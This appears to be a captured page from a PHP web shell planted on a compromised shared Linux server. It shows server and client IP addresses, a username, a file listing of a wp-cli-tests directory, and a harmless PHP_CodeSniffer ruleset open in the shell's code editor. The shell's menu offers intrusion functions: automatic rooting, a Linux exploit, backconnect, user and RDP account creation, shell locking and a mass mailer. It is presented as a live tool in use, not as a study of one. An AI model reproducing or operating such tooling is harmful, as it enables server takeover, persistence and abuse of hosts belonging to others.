Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
wp-cli /
wp-cli-tests /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
.readme-partials
[ DIR ]
drwxr-xr-x
WP_CLI_CS
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
features
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.actrc
129
B
-rw-r--r--
.distignore
175
B
-rw-r--r--
.editorconfig
591
B
-rw-r--r--
.gitattributes
104
B
-rw-r--r--
CONTRIBUTING.md
538
B
-rw-r--r--
LICENSE
1.12
KB
-rw-r--r--
README.md
10.02
KB
-rw-r--r--
behat.yml
126
B
-rw-r--r--
composer.json
2.53
KB
-rw-r--r--
phpcs.xml.dist
3.15
KB
-rw-r--r--
phpunit.xml.dist
541
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpcs.xml.dist
<?xml version="1.0"?> <ruleset name="WP-CLI-tests"> <description>Custom ruleset for WP-CLI-tests</description> <!-- ############################################################################# COMMAND LINE ARGUMENTS For help understanding this file: https://github.com/squizlabs/PHP_CodeSniffer/wiki/Annotated-ruleset.xml For help using PHPCS: https://github.com/squizlabs/PHP_CodeSniffer/wiki/Usage ############################################################################# --> <!-- What to scan. --> <file>.</file> <!-- Show progress. --> <arg value="p"/> <!-- Show rule name. --> <arg value="s"/> <!-- Strip the filepaths down to the relevant bit. --> <arg name="basepath" value="./"/> <!-- Check up to 8 files simultanously. --> <arg name="parallel" value="8"/> <!-- ############################################################################# USE THE WP_CLI_CS RULESET ############################################################################# --> <rule ref="WP_CLI_CS"/> <!-- ############################################################################# PROJECT SPECIFIC CONFIGURATION FOR SNIFFS ############################################################################# --> <!-- For help understanding the `testVersion` configuration setting: https://github.com/PHPCompatibility/PHPCompatibility#sniffing-your-code-for-compatibility-with-specific-php-versions --> <config name="testVersion" value="5.6-"/> <!-- Verify that everything in the global namespace is either namespaced or prefixed. See: https://github.com/WordPress-Coding-Standards/WordPress-Coding-Standards/wiki/Customizable-sniff-properties#naming-conventions-prefix-everything-in-the-global-namespace --> <rule ref="WordPress.NamingConventions.PrefixAllGlobals"> <properties> <property name="prefixes" type="array" extend="true"> <element value="WP_CLI\Tests"/><!-- Namespaces. --> </property> </properties> </rule> <!-- ############################################################################# SELECTIVE EXCLUSIONS ############################################################################# --> <!-- This is a procedural stand-alone file that is never loaded in a WordPress context, so this file does not have to comply with WP naming conventions. --> <rule ref="WordPress.NamingConventions.PrefixAllGlobals"> <exclude-pattern>*/utils/behat-tags\.php$</exclude-pattern> </rule> <rule ref="WordPress.WP.GlobalVariablesOverride"> <exclude-pattern>*/utils/behat-tags\.php$</exclude-pattern> </rule> <!-- This is a procedural stand-alone file that is adding polyfills when applicable only. --> <rule ref="WordPress.NamingConventions.PrefixAllGlobals"> <exclude-pattern>*/utils/polyfills\.php$</exclude-pattern> </rule> <!-- This is a procedural stand-alone file that is never loaded in a WordPress context, so this file does not have to comply with WP naming conventions. --> <rule ref="WordPress.NamingConventions.PrefixAllGlobals"> <exclude-pattern>*/generate-coverage\.php$</exclude-pattern> </rule> <rule ref="WordPress.WP.GlobalVariablesOverride"> <exclude-pattern>*/generate-coverage\.php$</exclude-pattern> </rule> </ruleset>
Close